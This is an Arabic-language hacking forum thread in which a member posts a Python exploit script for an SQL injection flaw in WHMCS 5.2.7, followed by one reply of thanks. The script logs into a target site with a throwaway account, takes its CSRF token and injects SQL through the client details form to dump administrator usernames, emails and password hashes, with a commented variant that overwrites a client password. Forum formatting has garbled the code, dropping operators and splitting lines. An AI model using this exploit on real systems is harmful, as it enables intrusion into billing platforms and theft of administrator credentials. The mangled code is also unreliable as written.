1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ABOJANA IRAQY | المشاهدات : 851 | الردود : 1
الوسوم:
حالة الموضوع:
مغلق
  1. ABOJANA IRAQY DeveloPer Plus

    الأنتساب:
    ‏10 مايو 2013
    المشاركات:
    126
    الإعجابات المتلقاة:
    74
    نقاط الجائزة:
    75

    WHMCS 5.2.7 SQL Injection



    [YOUTUBE]4YB-4IA8lUc[/YOUTUBE]

    كود PHP:
    #!/usr/bin/env python
    # 2013/10/03 - WHMCS 5.2.7 SQL Injection
    # http://localhost.re/p/whmcs-527-vulnerability

    url 'http://clients.target.com/' # wopsie dopsie
    user_email 'mysuper@hacker.account' # just create a dummie account at /iq-register.php
    user_pwd 'hacker'

    import urllibresys
    from urllib2 import Request
    urlopen
    ua 
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
    Safari/537.36"

    def exploit(sql):
    print 
    "Doing stuff: %s" sql
    urlopen(Request('%sclientarea.php?action=details' url,
    data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
    =0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
    anges" 
    % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' sqluser_email), headers={"User-agent"ua,
    "Cookie"user[0]})).read()
    return 
    re.search(r'(id="firstname" value="(.*?)")'r).group(2)

    def login():
    print 
    "Getting CSRF token"
    urlopen(Request('%slogin.php' urlheaders={"User-agent"ua}))
    csrf re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
    r.read()).group(2)
    cookie r.info()['set-cookie'].split(';')[0]
    print 
    "Logging in"
    urlopen(Request('%sdologin.php' urldata="username=%s&password=%s&token=%s" %(user_email,
    user_pwdcsrf), headers={"User-agent"ua"Cookie"cookie})).read()
    if 
    'dologin.php' in r:
    sys.exit('Unable to login')
    else:
    return [
    cookiere.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
    r).group(2)]

    user login()
    print 
    exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)'# get
    admins
    print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)'# just get a count of clients

    # oh you want to be evil
    #exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
    x)#" % user_email)
     
  2. вαиɒєя DeveloPer Plus

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    الوظيفة:
    طآلب
    الإقامة:
    k.s.a
    رد: WHMCS 5.2.7 SQL Injection

    لاهنت يابطل تحياتي
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة